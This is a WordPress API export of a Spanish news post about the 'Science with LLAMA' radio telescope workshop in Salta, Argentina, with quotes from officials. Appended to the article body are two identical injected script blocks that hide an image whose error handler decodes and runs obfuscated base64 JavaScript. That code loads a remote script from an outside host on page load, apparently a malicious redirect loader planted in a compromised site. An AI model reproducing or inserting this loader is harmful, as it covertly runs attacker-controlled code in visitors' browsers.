{"id":1452,"date":"2022-09-07T10:12:09","date_gmt":"2022-09-07T13:12:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1452"},"modified":"2025-08-14T00:36:03","modified_gmt":"2025-08-14T03:36:03","slug":"en-salta-cientificos-de-distintas-partes-del-mundo-debaten-sobre-el-proyecto-llama","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1452","title":{"rendered":"En Salta, cient\u00edficos de distintas partes del mundo debaten sobre el proyecto LLAMA"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#cf0537\"><em>Se lleva adelante el workshop \u201cScience with LLAMA\u201d, donde cient\u00edficos del proyecto, ingenieros y t\u00e9cnicos de la empresa INVAP S.E. realizan un intercambio de ideas, experiencias y perspectivas de investigaci\u00f3n relacionadas al radiotelescopio que se instalar\u00e1 en La Puna salte\u00f1a.<\/em><\/h3>\n\n\n\n<p>Se realiz\u00f3 el lanzamiento oficial del Workshop \u201cScience with LLAMA\u201d, el acto estuvo encabezado por el secretario de Articulaci\u00f3n Cient\u00edfica y Tecnol\u00f3gica del Ministerio de Ciencia, Tecnolog\u00eda e Innovaci\u00f3n de la Naci\u00f3n,&nbsp;<strong>Juan Pablo Paz<\/strong>&nbsp;y el ministro de Educaci\u00f3n, Ciencia y Tecnolog\u00eda,&nbsp;<strong>Mat\u00edas C\u00e1nepa<\/strong>.<\/p>\n\n\n\n<p>El funcionario nacional afirm\u00f3 que&nbsp;LLAMA \u00abes un proyecto cient\u00edfico, una instalaci\u00f3n concreta de primer nivel. Es un acierto que la Provincia haya tenido la visi\u00f3n estrat\u00e9gica para desarrollar y transformar a Salta en un polo de atracci\u00f3n para instalaciones de proyectos cient\u00edficos en el campo de la astronom\u00eda y la astrof\u00edsica a nivel internacional. Desde el Consorcio Salta Ventana al Universo se va a fortalecer la infraestructura de uso compartido. Creo yo, es un hallazgo muy importante del cual nos podemos sentir orgullosos y contentos\u201d.<\/p>\n\n\n\n<p>Por su parte, C\u00e1nepa indic\u00f3: \u201cEste proyecto tiene una enorme significaci\u00f3n para Salta. Tener en La Puna salte\u00f1a un polo de desarrollo de la astronom\u00eda con una colaboraci\u00f3n internacional de gran envergadura, es para nosotros muy importante, no solo por lo la investigaci\u00f3n en si misma y lo que implica para la zona sino tambi\u00e9n para la divulgaci\u00f3n de la Ciencia, el despertar vocaciones cient\u00edficas. Adem\u00e1s va a permitir que instituciones de primer nivel cient\u00edfico y de distintas partes del mundo puedan vincularse con nuestra universidad\u201d.<\/p>\n\n\n\n<p>Y agreg\u00f3: \u201cNo solamente tenemos que estar en las urgencias sino en las cuestiones de fondo como esta. Para nosotros es un proyecto importante que impulsa el gobernador como una pol\u00edtica de Estado\u201d.&nbsp;<\/p>\n\n\n\n<p>Por \u00faltimo, reconoci\u00f3 la acci\u00f3n y decisi\u00f3n del ministro Filmus y su equipo, \u201cquienes reactivaron este proyecto que hab\u00eda quedado trunco. Nosotros apoyamos y acompa\u00f1amos en todo lo que haga falta para que est\u00e9 en marcha cuanto antes\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4022-en-salta-cientificos-de-distintas-partes-del-mundo-debaten-sobre-el-proyecto-llama.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4022-en-salta-cientificos-de-distintas-partes-del-mundo-debaten-sobre-el-proyecto-llama.jpg\" alt=\"En Salta, cient\u00edficos de distintas partes del mundo debaten sobre el proyecto LLAMA\"\/><\/a><\/figure>\n\n\n\n<p>A su turno, coordinador del Consorcio Salta Ventana al Universo, Diego Garc\u00eda Lamba, expres\u00f3: \u201cEstos proyectos se realizan con tecnolog\u00eda de punta en el mundo y trae beneficios a los cient\u00edficos de la provincia. Adem\u00e1s estos encuentros son importantes porque permiten la interacci\u00f3n con cient\u00edficos que desarrollan proyectos en diferentes partes del mundo con la ultima tecnolog\u00eda en tem\u00e1ticas relacionadas a la radioastonom\u00eda y telescopios \u00f3pticos.<\/p>\n\n\n\n<p>Adem\u00e1s traer\u00e1 beneficios concretos en materia de infraestructura y m\u00e1s trabajo. Tambi\u00e9n estos proyectos generar\u00e1n cosas que aun no imaginamos pero que ser\u00e1n beneficiosas para la Provincia\u201d.<\/p>\n\n\n\n<p>Llama es uno de los proyectos que se est\u00e1n desarrollando en La Puna, otro es Qubic y se espera que sean muchos m\u00e1s los que conformen el Consorcio Salta Ventana al Universo.<\/p>\n\n\n\n<p>Del encuentro participaron cient\u00edficos destacados de Reino Unido, Taiw\u00e1n, Jap\u00f3n, M\u00e9xico, Canad\u00e1, Francia, Estados Unidos, Espa\u00f1a y Argentina.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"En Salta, cient\u00edficos de distintas partes del mundo debaten sobre el proyecto LLAMA\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/sDHDFG2JXXQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se lleva adelante el workshop \u201cScience with LLAMA\u201d, donde cient\u00edficos del proyecto, ingenieros y t\u00e9cnicos de la empresa INVAP S.E. realizan un intercambio de ideas, experiencias y perspectivas de investigaci\u00f3n relacionadas al radiotelescopio que se instalar\u00e1 en La Puna salte\u00f1a. Se realiz\u00f3 el lanzamiento oficial del Workshop \u201cScience with LLAMA\u201d, el acto estuvo encabezado por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1454,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1452","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1452"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1452"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1452\/revisions"}],"predecessor-version":[{"id":7359,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1452\/revisions\/7359"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1454"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}